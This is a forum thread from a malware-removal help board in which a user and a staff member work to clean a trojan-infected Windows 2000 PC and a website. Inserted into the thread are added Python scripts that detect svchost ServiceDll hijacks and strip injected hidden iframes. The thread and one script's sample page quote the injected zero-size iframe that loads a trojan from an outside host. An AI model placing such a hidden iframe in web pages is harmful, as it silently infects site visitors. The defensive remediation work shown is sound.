svchost.exe & Trojans

Discussion in 'Malware Help - MG (A Specialist Will Reply)' started by PommeVerte, Jan 1, 2008.

  1. PommeVerte

    PommeVerte Private E-2

    I have some serious infections on my computer. I have downloaded BitDefender and this is the message I get when I try to run the program:

    "The installation package could not be opened. Contact the application vendor to verify that this is a valid Windows installer package. The set up process could not be completed due to an internal error. If this is a fresh install, please scan with the 'BitDefender on-line scanner' and try to install the product again."

    I did this. Then I got this report back.
    Scan Info
    Scanned Files 84384
    Infected Files 4
    Virus Detected
    Trojan.PWS.LDPinch.TEZ 1
    GenPack:Generic.Onlinegames.5.7451E862 1
    Trojan.Agent.AGHO 1
    BehavesLike:Win32.Malware 1

    And this one:
    Scanned File: Status
    C:\Recycled\svchost.exe
      Suspected of: BehavesLike:Win32.Malware
      Disinfection failed
      Delete failed
    C:\WINNT\system\sslxpes071227.exe
      Infected with: GenPack:Generic.Onlinegames.5.7451E862
      Disinfection failed
      Deleted
    C:\WINNT\system32\svchost.exe
      Infected with: Trojan.PWS.LDPinch.TEZ
      Disinfection failed
      Delete failed
    C:\WINNT\system32\vnqsup.dll
      Infected with: Trojan.Agent.AGHO
      Disinfection failed
      Delete failed

    ---
    I downloaded this one, too:
    FixIEDef.exe
    And when I double click, it goes through a quick upload, and does absolutely nothing.

    I have run Ad-aware and Trojan Remover and SpyBot. I have Avira as an anti-virus, but this whole machine got infected anyway. I get svchost.exe error messages and it goes to blue screen when I am trying to shut down and when I turn the machine on, it takes several tries to get it up and going because of svchost.exe errors.

    Is there anything I can do now?

    Thanks,
    Helen
     
  2. TimW

    TimW MajorGeeks Administrator - Jedi Malware Expert Staff Member

  3. PommeVerte

    PommeVerte Private E-2

    Hello,
    I followed the directions you provided with the exception of the AVG scan. I didn't see the special instructions for saving the log, and now I don't have one. But I went to the Quarantine section and copied that and pasted it into a jpg. It's attached with the other two logs requested.

    My dial-up link is missing. I have it on the desktop, but when I double click, the message says "Not Found." My Add Remove Programs comes up and when I click it, nothing happens. Worse, I cannot get it to close, so it hangs out on the screen until I open something on top of it. My Unplug Icon doesn't work like it used to. If I add a camera while the computer's on, the Icon doesn't appear. I have to go through a lot to close the camera or external drive. I have been getting error messages when I start the computer that the svchost.exe has errors and will be closed. Earlier, I got a message from I think AVG that my link library mscoree.dll is not found.

    I don't know how this started precisely. I was working on my blog, which is a Word Press blog through my server, acornhost, and I started getting a lot of links from a spammer who was selling pharmaceuticals. I deleted them, but noticed I suddenly had a "permalink" on some of my entries in my blog. I don't know what that is, and I couldn't get rid of them. One night, my blog just went crazy and I could only see the entry I'd just written, the layout was missing widgets and was corrupt. This was on IE. When I viewed my blog on Firefox, which I now am only using, it came out as a normal looking blog. But no matter where I look at my blog with IE, it is corrupt. (www.dobermannpinscher.org/WordPress) I redownloaded the skin, thinking that would bring the blog back into order, but it did not. Now I have an ugly skin on it just to make it work halfway decent.

    A friend told me to delete all my Quarantined stuff one night, and so I did. I think that was through AdAware. Well, the computer was infected before then, but when I deleted the stuff, that's when there were many missing parts - like the dial-up icon didn't work and the add/remove programs went away. I cannot tell everything that isn't working, but the machine is limping along. Whatever I do on it has a longer process to get to than before when my links to desktop icons or start-menu icons worked.

    I have something called Avira Anti-Virus. It's a free program that doesn't seem to have worked quite so well.

    I got this computer from someone who donates time and refurbishes old computers to people involved in dog rescue. It had been working fine for the couple months I had it and then this catastrophe took place. Do you suppose I can fix it?

    Thanks,
    Helen
     


  4. TimW

    TimW MajorGeeks Administrator - Jedi Malware Expert Staff Member

    Let's start with this:
    Please install:
    Java Runtime 6

    Now download The Avenger by Swandog469, and save it to your Desktop.

    * Extract avenger.exe from the Zip file and save it to your desktop
    * Run avenger.exe by double-clicking on it.
    * Check the 'Input script manually' box.
    * Click on the magnifying glass icon.
    * Copy everything in the Quote box below, and paste it in the box that opens:

    * Now click the 'Done' button.
    * Click on the traffic light icon and OK the prompt.
    * You will be prompted to restart, OK the prompt and your PC should reboot, if not, reboot it yourself.
    * A log file from Avenger will be produced at C:\avenger.txt

    Now run the C:\MGtools\GetLogs.bat file by double clicking on it. Then attach the new C:\MGlogs.zip file that will be created by running this and also attach the log from Avenger.
     
  5. PommeVerte

    PommeVerte Private E-2

    OK, Tim.
    Logs are attached as requested.
    Thank you,
    Helen
     


  6. TimW

    TimW MajorGeeks Administrator - Jedi Malware Expert Staff Member

    Do you know what this is:
    C:\gz

    * Run avenger.exe by double-clicking on it.
    * Check the 'Input script manually' box.
    * Click on the magnifying glass icon.
    * Copy everything in the Quote box below, and paste it in the box that opens:

    * Now click the 'Done' button.
    * Click on the traffic light icon and OK the prompt.
    * You will be prompted to restart, OK the prompt and your PC should reboot, if not, reboot it yourself.
    * A log file from Avenger will be produced at C:\avenger.txt

    Now run the C:\MGtools\GetLogs.bat file by double clicking on it. Then attach the new C:\MGlogs.zip file that will be created by running this and also attach the log from Avenger.

    Tell me how things are running.
     
  7. PommeVerte

    PommeVerte Private E-2

    Hi Tim,
    I don't know what C:\gz is. I right clicked on it and ran it through my Avira antivirus, AVG antispyware, and the trojan remover and all three said it didn't pose a threat.

    My dial-up link is still missing. I have it on the desktop, but when I double click, the message says "Not Found." My Add Remove Programs comes up and when I click it, nothing happens still. I have been getting error messages when I start the computer that the svchost.exe has errors and will be closed. If I don't let the machine do its whole start-up, which takes a very long time, including waiting for the svchost.exe error log message to be closed on its own, when I get into dial-up, my computer cannot find the interface for the modem connection, and I have to start the whole process over - reboot. It's very very long.

    Since running these scans, my computer will not shut down. It goes to a blue screen and stays there. I have to unplug it to get it to stop.

    When I booted up this last time, I got a message from Avira that C:\avenger\irhcjj.dll has a dangerous backdoor program BDS/Pcclient.atg. I chose to deny access. It doesn't matter what I do to that program, deny access, ignore, quarantine, it always comes back.

    My link library mscoree.dll is still not found. Really, nothing's changed. Just the machine won't shut down on its own now.

    The two logs you requested are attached.

    Thank you,
    Helen
     


  8. TimW

    TimW MajorGeeks Administrator - Jedi Malware Expert Staff Member

    I'm concerned about it being a refurbished machine ...however, let's move on.

    Go ahead and delete:
    C:\gz
    C:\Recycled

    * Click on Start, then Run ... type services.msc into the box that opens up, and press 'OK'.
    * On the page that opens, scroll down to Window Event Server
    * then right click the entry, select Properties and press Stop Service.
    * When it shows that it is stopped, next please set the Start-up Type to 'Disabled'.
    * Click OK until you get back to Windows.

    * Next, run HJT (C:\MGtools\analyse.exe), but instead of scanning, click on the None of the above, just start the program button at the bottom of the choices.
    * At the lower right, click on the Config button
    * Then click the Misc tools button
    * Select Delete an NT Service
    * Copy/paste windowneters into the box that opens, and press OK
    * If you receive any error messages just ignore them.
    Now just exit out of HJT.

    For now, to get you to shut down, let's try this (I think this works for W2K - not in front of that machine right now):
    1. Create a shortcut (Right-click on desktop, select New > Shortcut).

    2. For location, type the following:

    shutdown -r -t 0

    3. Click Next, enter a name for the shortcut ("Restart" is appropriate), and click Finish.

    When you click your Restart shortcut, Windows XP will reboot *automatically*!

    The "-r" switch tells XP to reboot. If you'd like the shortcut to shut off your PC instead, change it to "-s"; to simply log off, change it to "-l". The "-t 0" sets the timeout (in seconds), so up this value if you find the need for it.

    I want you to open My Computer and right click the C drive ....properties ...tools ...error checking and check both boxes to find and fix errors. (It will require a restart). Watch the progress and tell me if it finds any bad sectors.

    Do you have the windows cd?
     
  9. PommeVerte

    PommeVerte Private E-2

    I followed the instructions above.
    The shortcut idea didn't work. The message was that the file shutdown couldn't be found.

    The c drive check gave the message "Type of file system NTFS. The Volume is clean."

    No, I don't have the windows cd. Do I need it?

    svchost.exe still gives error message and machine still won't shut down unless I unplug it. What a mess.

    Thanks,
    Helen
     
  10. TimW

    TimW MajorGeeks Administrator - Jedi Malware Expert Staff Member

    Post the exact BSOD message ....we need to see the fault item.

    This "refurbished machine" was sold thru a store and did not come with a cd?

    Note: you need not quote my last message in your replies.
     
  11. PommeVerte

    PommeVerte Private E-2

    I don't know what BSOD is.

    I didn't buy this machine at a store. A man refurbishes them from his work when they get new ones and gives them to people who do rescue. He put all the software on and sent it to me.
     
  12. PommeVerte

    PommeVerte Private E-2

    I sent my computer back to my friend and he did a complete re-installation of everything from the Windows 2000 to all the software. I had BitDefender AV on it till last night when I changed it to BitDefender Internet Security, which includes the AV. The second night I went on-line, I had one window opened, my blog. The night before, I updated my website. While working in Word Press, I noticed something was going on with the formatting, it was behaving oddly, so I cut my whole entry, pasted it in Word, then back in Word Press. Somewhere during this time, I had my first warning that there was this TROJAN HACKTOOL AGENT BE around. Next morning, I ran a scan and got this message
    C:\WINNT\system32\config\7fb8a36515353baa56fedadb218604e5\smss.exe
    Trojan.Hacktool.Agent.BE
    Deleted.

    That Trojan.Hacktool.Agent.BE keeps coming up ... the BitDefender keeps telling me it's detected it and either deleted it or access denied. Computer's running slow. Is this going to be a permanent problem on this hard drive? I don't know where that thing is coming from or how to get rid of it permanently. Especially after the whole system was redone.

    Is there a way to do a scan of my files on my Dreamweaver FTP server (not sure if that's the right terminology)...but my files that are for my website and blog?

    Thanks,
    Helen
     
  13. TimW

    TimW MajorGeeks Administrator - Jedi Malware Expert Staff Member

    You would need to copy those files back to your computer ...put them in a separate folder and then follow the instructions in the below link and attach the requested logs when you finish these instructions.

    READ & RUN ME FIRST. Malware Removal Guide

    We need to see where the problem lies.
     
  14. PommeVerte

    PommeVerte Private E-2

    Hi Tim,
    This morning, at work, I went onto my website and their McAfee AVERT AV program popped up! My website has the trojan on it! I've attached three things. One is the log from McAfee for just this morning, and at the end is the findings for the two major threats McAfee warned about. The other two pieces are halves of a whole. It's the screen that popped up to warn me about this.

    I have no idea what to do. How do I get my website clean? How do I keep it from being infected again? How did it get infected? I wonder if it is in DreamWeaver. This is very confusing. My website is nonprofit, so I don't want people to get infected either. Should I shut it down for now?

    Thank you for your help,
    Helen
     


  15. TimW

    TimW MajorGeeks Administrator - Jedi Malware Expert Staff Member

    The two look like scripts being executed from your temp internet files....

    Please download ATF Cleaner by Atribune. This program does not require an installation. The executable actually runs the program.

    NOTE: This program is for Windows XP and Windows 2000 only. ATF Cleaner will remove all files from the items that are checked, so if you have some cookies you'd like to save, please move them to a different directory first.

    * Double-click ATF-Cleaner.exe to run the program.
    * Under Main choose: Select All
    * Click the Empty Selected button.

    If you use Firefox browser

    * Click Firefox at the top and choose: Select All
    * Click the Empty Selected button.
    o NOTE: If you would like to keep your saved passwords, please click No at the prompt.

    If you use Opera browser

    * Click Opera at the top and choose: Select All
    * Click the Empty Selected button.
    o NOTE: If you would like to keep your saved passwords, please click No at the prompt.

    Click Exit on the Main ATF Cleaner menu to close the program.

    Now I want an online scan: go to Bitscan link: agree to the license and then select Scan. DO NOT CHANGE THE OPTIONS TO SHOW ALL FILES SCANNED. That will make your logs huge and we don't need to see clean files. Once Bitdefender completes the scan:

    Click-on the Detected Problems tab. Then select Click here to export the scan report

    When the window comes up to save the report, change the Save as type: box to Text (Tab Delimited) (*.txt) and then in the File name box change the name to bdscan, then click save. This will save a file named bdscan.txt in whatever folder you are currently in when you save the file (take notice of where you are at so you can find it later). This bdscan.txt file will actually contain HTML code that we can easily view later while reviewing your log. All we have to do is rename the file to bdscan.html.
     
  16. PommeVerte

    PommeVerte Private E-2

    I will do all that you suggest. I wanted to offer something the help desk from my server sent me to do:
    It appears your webpage is loading the site http://internet.wpvgm.com/cuteqqcn.htm at the bottom of the index.html. This could be caused by compromised software on your computer. If you remove the iframe tag with that URL it should stop trying to load a Trojan upon visit to the site.

    I'm going to that first thing when I get home because I don't want visitors to my website getting trojans. I don't think that will fix the computer, though, but just wanted to give you all the information I have.

    Thanks,
    Helen
     
  17. TimW

    TimW MajorGeeks Administrator - Jedi Malware Expert Staff Member

    Let me know how that goes.
     
  18. PommeVerte

    PommeVerte Private E-2

    I did what you asked. The on-line scan came out clean, which is ridiculous. But then again, I have Bit Defender Internet Security on my computer and the trojan has changed its configuration. I used to be able to right click on a file, choose send to, and Bit Defender was there to scan. That lasted a few hours and I can no longer send to Bit Defender - that option has disappeared.

    I keep getting pop-ups from Bit Defender that it is protecting my computer and it has thwarted another attempt of a trojan attack to my docs/temp....but I don't think so.

    Last night, I went into DreamWeaver to remove that line of text, and I could NOT remove it successfully. When I did remove it and uploaded the index, the line reappeared. It didn't matter which side of DreamW I used, the line reappeared. So I went onto the server, and closed DW. On the server I removed the text, and it stuck.

    Afterwards, I came back into my computer to delete as many temp files as I could. I found the "index" file and deleted it. Either I couldn't delete it or it would look like it deleted only I would find it elsewhere.

    Helen
     
  19. TimW

    TimW MajorGeeks Administrator - Jedi Malware Expert Staff Member

    Give me the exact path to the files and we will try using Avenger to remove them.
     
  20. PommeVerte

    PommeVerte Private E-2

    What I see is this. When I open Dreamweaver 4, and I open the INDEX on my C drive for my website, that malware website address I referenced earlier is STILL embedded in the bottom of the index. I delete it, save, and it pops back up in the same place in the INDEX. THAT is infuriating. How can someone make that happen? I can't update my website now because that thing is there and has control.

    This is where a file was deleted today during the scan - and just about every time I run a scan it is supposedly deleted, but yet, here it is again. And this is where one of the two pop-ups from BitDefender keep saying it's deleted or blocked the TrojanBackDoor Agent BE.

    C:\WINNT\system32\config\7fb8a36515353baa56fedadb218604e5\smss.exe Trojan.Hacktool.Agent.BE
    Deleted

    Helen
     
  21. TimW

    TimW MajorGeeks Administrator - Jedi Malware Expert Staff Member

    * Run avenger.exe by double-clicking on it.
    * Check the 'Input script manually' box.
    * Click on the magnifying glass icon.
    * Copy everything in the Quote box below, and paste it in the box that opens:

    * Now click the 'Done' button.
    * Click on the traffic light icon and OK the prompt.
    * You will be prompted to restart, OK the prompt and your PC should reboot, if not, reboot it yourself.
    * A log file from Avenger will be produced at C:\avenger.txt

    Now run the C:\MGtools\GetLogs.bat file by double clicking on it. Then attach the new C:\MGlogs.zip file that will be created by running this and also attach the log from Avenger.
     
  22. PommeVerte

    PommeVerte Private E-2

    More -

    Remaining issues (Object Name / Threat Name / Final Status):
    [System]=]HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\SERVICES\AUTHORIZATION\PARAMETERS\ServiceDll=]C:\WINNT\SYSTEM32\FWTCWAICSLNVVAJCXSTO.DLL
      Trojan.Downloader.Agent.ZBP: No action was possible
    C:\WINNT\system32\FWTCWAicsLnVVaJcxsTo.dll
      Trojan.Downloader.Agent.ZBP: Move to Quarantine Failed

    Resolved issues (Object Name / Threat Name / Final Status):
    C:\WINNT\system32\config\7fb8a36515353baa56fedadb218604e5\smss.exe
      Trojan.Hacktool.Agent.BE: Deleted
     
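    The "No action was possible" entry in the post above is the signature of a svchost-hosted service hijack: the ServiceDll value under HKLM\SYSTEM\CurrentControlSet\Services\<name>\Parameters tells svchost.exe which DLL to load for that service, so pointing it at a randomly named file in system32 gets the malware loaded on every boot by a legitimate, signed host process (which is why the scanners keep reporting svchost.exe itself). The script below is an added example for this page, not a tool from the thread, BitDefender or MajorGeeks. It parses a .reg export of the Services key (regedit File > Export, or reg.exe export) and flags ServiceDll values that sit outside %SystemRoot%\system32 or whose file name looks machine-generated. The sample export, the Dnscache/Browser entries and the "Example" service are constructed for illustration; C:\WINNT is assumed because the machine in the thread runs Windows 2000.

```python
import re
from pathlib import PureWindowsPath

KEY_RE = re.compile(r"^\[(.+)\]$")
SERVICE_DLL_RE = re.compile(r'^"ServiceDll"=(.*)$', re.IGNORECASE)
# ...\Services\<name>\Parameters is the key svchost.exe reads ServiceDll from.
SERVICE_KEY_RE = re.compile(r"\\services\\([^\\]+)\\parameters$", re.IGNORECASE)


def _reg_expand_sz(s: str) -> str:
    """Encode a string the way a .reg export stores REG_EXPAND_SZ: hex(2): + UTF-16LE bytes."""
    return "hex(2):" + ",".join(f"{b:02x}" for b in (s + "\0").encode("utf-16-le"))


# Constructed sample export (not a real export from the machine in the thread).
# The AUTHORIZATION entry copies the finding reported in the post above; Dnscache
# and Browser are ordinary svchost-hosted services; "Example" is invented to
# exercise the out-of-directory check.
SAMPLE_REG = "\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    r"[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters]",
    r'"ServiceDll"="C:\\WINNT\\system32\\dnsrslvr.dll"',
    "",
    r"[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Browser\Parameters]",
    '"ServiceDll"=' + _reg_expand_sz(r"%SystemRoot%\system32\browser.dll"),
    "",
    r"[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AUTHORIZATION\Parameters]",
    r'"ServiceDll"="C:\\WINNT\\SYSTEM32\\FWTCWAicsLnVVaJcxsTo.dll"',
    "",
    r"[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Example\Parameters]",
    r'"ServiceDll"="C:\\Recycled\\example.dll"',
])


def decode_reg_value(raw: str) -> str:
    """Decode a quoted REG_SZ or a hex(2): REG_EXPAND_SZ value from a .reg file."""
    raw = raw.strip()
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    if raw.lower().startswith(("hex(2):", "hex:")):
        data = bytes.fromhex(raw.split(":", 1)[1].replace(",", "").replace(" ", ""))
        return data.decode("utf-16-le").rstrip("\0")
    return raw


def parse_service_dlls(reg_text: str) -> dict:
    """Map service name -> raw ServiceDll string for every Parameters key in the export."""
    result, service, pending = {}, None, None
    for line in reg_text.splitlines():
        if pending is not None:  # hex values wrap across lines, each ending in "\"
            pending += line.strip()
            if pending.endswith("\\"):
                pending = pending[:-1]
                continue
            result[service], pending = decode_reg_value(pending), None
            continue
        m = KEY_RE.match(line.strip())
        if m:
            sm = SERVICE_KEY_RE.search(m.group(1))
            service = sm.group(1) if sm else None
            continue
        m = SERVICE_DLL_RE.match(line.strip())
        if m and service:
            raw = m.group(1).strip()
            if raw.endswith("\\"):
                pending = raw[:-1]
            else:
                result[service] = decode_reg_value(raw)
    return result


def looks_random(filename: str, min_case_flips: int = 3) -> bool:
    """Heuristic: real system DLL names are short lower-case words (dnsrslvr, browser);
    the one in the thread flips case nine times."""
    letters = [c for c in PureWindowsPath(filename).stem if c.isalpha()]
    flips = sum(1 for a, b in zip(letters, letters[1:]) if a.isupper() != b.isupper())
    return flips >= min_case_flips


def audit_service_dlls(reg_text: str, system_root: str = r"C:\WINNT", trusted=()) -> list:
    """Return one finding per suspicious ServiceDll; 'trusted' lists DLL names already verified."""
    findings = []
    expected_dir = str(PureWindowsPath(system_root, "system32")).lower()
    trusted_names = {t.lower() for t in trusted}
    for service, dll in parse_service_dlls(reg_text).items():
        expanded = re.sub(r"%systemroot%", lambda _m: system_root, dll, flags=re.IGNORECASE)
        path = PureWindowsPath(expanded)
        if path.name.lower() in trusted_names:
            continue
        reasons = []
        if str(path.parent).lower() != expected_dir:
            reasons.append(f"outside {expected_dir}")
        if looks_random(path.name):
            reasons.append("random-looking file name")
        if reasons:
            findings.append({"service": service, "dll": str(path), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_service_dlls(SAMPLE_REG):
        print(f"{f['service']}: {f['dll']}  [{'; '.join(f['reasons'])}]")
```

    On a real export, read the file with encoding="utf-16" (regedit writes Unicode) before passing it to audit_service_dlls, and treat the name heuristic as a triage aid: the directory check catches DLLs planted outside system32, the case-flip check catches generated names like the one here, but a sensible-looking name in system32 still needs the file's signature and hash verified.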
  23. TimW

    TimW MajorGeeks Administrator - Jedi Malware Expert Staff Member

    Add to the Avenger fix:
    * Run avenger.exe by double-clicking on it.
    * Check the 'Input script manually' box.
    * Click on the magnifying glass icon.
    * Copy everything in the Quote box below, and paste it in the box that opens:

    * Now click the 'Done' button.
    * Click on the traffic light icon and OK the prompt.
    * You will be prompted to restart, OK the prompt and your PC should reboot, if not, reboot it yourself.
    * A log file from Avenger will be produced at C:\avenger.txt
     
  24. PommeVerte

    PommeVerte Private E-2

    Hello Tim,
    I followed the directions above, and got an error message about the log not being able to ZIP. But something strange happened last night, and then something stupid happened.

    The strange thing was there was a sudden peace in the computer that wafted through me and all over the house. I went on-line and did not get one single pop-up message from BitDefender that my computer was being attacked and that it was defending it.

    This was after I did the avenger AND I went back into DreamWeaver, which to me is the Devil at this time. Dreamweaver holds the key to this beast. In EVERY single HTML document is that line I posted earlier...
    <iframe src="**** :// internet.wpvgm.com/cuteqqcn.***" width="0" height="0" frameborder="0"></iframe>

    I mean EVERY one. Their templates, the pages I built, and whenever I opened DW, a new document would pop up and that code was on the bottom. The difference now from then was that I deleted that code from all my pages and it stayed deleted this time. However it is everywhere. I found a folder named Template (or something like that) and inside was an html doc that was where all the new documents were drawn from. I deleted it, and when I opened up a new document, there was no more of that code. I went through all of my pages and did that. I closed DW and went online, then went off line.

    I thought about deleting the whole DW program, but didn't want to do that, so I opened DW up again and opened some of its pre-installed html pages. The first one I opened, came up in the Firefox page and asked if I would go on-line, but I said no. I managed to change the source code there and saved it. I opened that page again, and it was gone. Here comes the stupid part...but really, I didn't know this would happen.

    I opened up the next page, and when given a choice, I went into WORD to change the code. But when the page was loading, there was a flash on the page that said "Preparing to Install..." That's when I shut down WORD immediately. And DW afterwards. I didn't see anything happening, but I don't know if it did or not behind the scenes.

    I then went into BitDefender and ran that scan and for once, it came up clean.

    This morning, I brought my external hard drive to work and looked at all my html files I'd saved from DW when I sent my computer off to get all the software, and OE re-installed...sure enough, all the pages have that code on it! The software at work, McAfee, is catching this code when I open the document up. But why, when I scanned my entire external hard drive here at work, does it not catch that line as malicious code?

    I have not opened my computer since the WORD incident and my post BD scan last night. I am hoping the scan proves correct and that the malicious program didn't install. I will find out later. But I did do a websearch this morning on the code above, and besides my post here, I found one page in German that I translated...this person is having the same problem. And what I can get from the gist of the conversation is this is a new trojan. It's here.
    http://translate.google.com/transla...reamweaver+internet.wpvgm.com/cuteqqcn.&hl=en

    One other thing on this and I think it is key. I was using bravenet for the counter on my regular website. Then I added a bravenet counter to my blog. What was weird was that even though I told bravenet NOT to count my visits to the site, every time I visited my site, the counter went up, which caused me to go into bravenet where I had to change the settings. And every time I changed the settings not to count me, the next day, the setting reverted and I had to either leave it or be counted. I went into bravenet a lot to fix this. In the meantime, the code for my counter disappeared one day on my website. And after I added bravenet's counter code to my blog, my blog went haywire. I am trying to piece all this together. But the malicious code put itself right on the bottom of the page under the absent bravenet counter code. Is this a "counter trojan?" Does it come from bravenet's site? I don't know, but I removed bravenet counters from both blog and website, and I installed one from another site.

    I wanted to give you all the information I have on this because someone else may find themselves in this same situation.

    Bottom line now is would you know of a way to remove that code from all the DW html files? I fear leaving one strand of it behind will cause havoc sooner or later.

    Thank you for your help,
    Helen
     
  25. TimW

    TimW MajorGeeks Administrator - Jedi Malware Expert Staff Member

    Avenger didn't need to be zipped...but I'm curious and would like to see what happens if you run this:
    Script Sentry
     
  26. PommeVerte

    PommeVerte Private E-2

    Tim,
    Can you help me out? I don't know what to do with all the boxes. How do I run it?
    Thanks,
    Helen
     
  27. TimW

    TimW MajorGeeks Administrator - Jedi Malware Expert Staff Member

    Download....unzip ...click on the exe file to install ...you should get a config panel ....set to recommended and then if you want to check a vbe or other script click on the test program and paste in the file.
     
  28. PommeVerte

    PommeVerte Private E-2

    >>Download....unzip ...click on the exe file to install ...you should get a config panel ....set to recommended and then if you want to check a vbe or other script click on the test program and paste in the file.<<

    There are no "recommended" boxes. I don't know what vbe is or other script or why am I picking boxes? You're giving me way too much credit for knowing how to run this program. :)

    On the webpage it says:
    "Windows Scripting Host (WSH) is a double-edged sword. On one hand it can be used to make some very useful scripts to automate common Windows functions (for example, the Spell Checker script from PC911). On the other hand, it can be very easy for a malicious user to make a virus using WSH."

    I don't feel comfortable picking boxes on my own or running this program from what I read above. I don't understand what we are trying to do with the program. What is this program for? Will it help me get rid of that line of HTML I still have on every HTML file? In my external hard drive alone, I found 1973 instances of that text. My computer hasn't had a virus pop-up since I ran the program previous to this one, but I am being very careful not to open any HTML files on my system.

    Can you give me some additional information?

    Thank you,
    Helen
     
  29. TimW

    TimW MajorGeeks Administrator - Jedi Malware Expert Staff Member

    It could be used to stop malicious scripts from running...however basically you will have to fix all the HTML files or delete them and replace them from a backup if you have one.
     
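    Post 24 asks how to strip the injected line from every Dreamweaver HTML file (1973 copies on the external drive alone), and the reply above says the files have to be fixed or restored from backup. The script below is an added example for this page, not something from the thread or from MajorGeeks. It walks a folder of web files, finds iframes that are both hidden (zero width or height, or display:none) and sourced from a host other than the site's own, reports them per file, and optionally rewrites the file with a .bak copy kept. The own-host list, the file-suffix set and the sample page are assumptions; the injected line in the sample is the one the hosting help desk quoted in post 16.

```python
import re
import tempfile
from pathlib import Path

# Assumed: the site's own hosts. A zero-size frame pulling from any other host is suspect.
OWN_HOSTS = {"www.dobermannpinscher.org", "dobermannpinscher.org"}
# .dwt is the Dreamweaver template type; the thread found the line in the template too.
WEB_SUFFIXES = {".htm", ".html", ".shtml", ".php", ".asp", ".dwt"}

IFRAME_RE = re.compile(r"<iframe\b[^>]*>(?:\s*</iframe>)?", re.IGNORECASE)
ATTR_RE = re.compile(r'\b([a-z-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))', re.IGNORECASE)
HOST_RE = re.compile(r"^(?:[a-z][a-z0-9+.-]*:)?//([^/:?#]+)", re.IGNORECASE)

# Constructed sample page (not the real index.html from the thread). The first
# iframe is a legitimate visible embed from the site's own host; the second is
# the injected line quoted in the thread.
SAMPLE_HTML = """<html><body>
<h1>Dobermann rescue</h1>
<iframe src="http://www.dobermannpinscher.org/WordPress/" width="600" height="400"></iframe>
<iframe src="http://internet.wpvgm.com/cuteqqcn.htm" width="0" height="0" frameborder="0"></iframe>
</body></html>
"""


def iframe_attrs(tag: str) -> dict:
    """Attribute name -> value for one <iframe ...> tag, quoted or bare values."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
            for m in ATTR_RE.finditer(tag)}


def is_injected_iframe(tag: str, own_hosts=OWN_HOSTS) -> bool:
    """Hidden frame whose src host is not one of ours."""
    a = iframe_attrs(tag)
    m = HOST_RE.match(a.get("src", "").strip())
    host = m.group(1).lower() if m else ""
    style = a.get("style", "").replace(" ", "").lower()
    hidden = (a.get("width", "").strip() == "0" or a.get("height", "").strip() == "0"
              or "display:none" in style or "visibility:hidden" in style)
    return hidden and bool(host) and host not in own_hosts


def strip_injected_iframes(html: str, own_hosts=OWN_HOSTS):
    """Return (cleaned html, list of removed src URLs); visible own-site frames are kept."""
    removed = []

    def repl(m):
        tag = m.group(0)
        if is_injected_iframe(tag, own_hosts):
            removed.append(iframe_attrs(tag).get("src", ""))
            return ""
        return tag

    return IFRAME_RE.sub(repl, html), removed


def clean_tree(root, own_hosts=OWN_HOSTS, apply: bool = False) -> dict:
    """Walk root and report injected frames per file. With apply=True the file is
    rewritten and a .bak copy kept. Bytes are decoded with surrogateescape and
    re-encoded the same way so non-UTF-8 characters and CRLF line ends survive."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in WEB_SUFFIXES:
            continue
        text = path.read_bytes().decode("utf-8", "surrogateescape")
        cleaned, removed = strip_injected_iframes(text, own_hosts)
        if not removed:
            continue
        report[str(path)] = removed
        if apply:
            path.with_name(path.name + ".bak").write_bytes(path.read_bytes())
            path.write_bytes(cleaned.encode("utf-8", "surrogateescape"))
    return report


def demo_on_temp_dir():
    """Write the sample page into a scratch tree, clean it, return (report, cleaned text)."""
    with tempfile.TemporaryDirectory() as d:
        page = Path(d) / "site" / "index.html"
        page.parent.mkdir()
        page.write_bytes(SAMPLE_HTML.encode("utf-8"))
        report = clean_tree(d, apply=True)
        return ({Path(k).name: v for k, v in report.items()},
                page.read_bytes().decode("utf-8"))


if __name__ == "__main__":
    report, cleaned = demo_on_temp_dir()
    for name, urls in report.items():
        print(f"{name}: removed {urls}")
    print(cleaned)
```

    Run it first without apply=True to see the report, and only from a machine that is already known clean: the thread shows the line re-appearing in Dreamweaver seconds after it was deleted, so whatever is writing it has to be gone before the files are worth fixing. The server copy and the Dreamweaver template folder need the same pass, or the next page generated from the template carries the frame again. Frames hidden some other way (CSS classes, scripts that insert the element) will not match these rules and still need a manual look.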
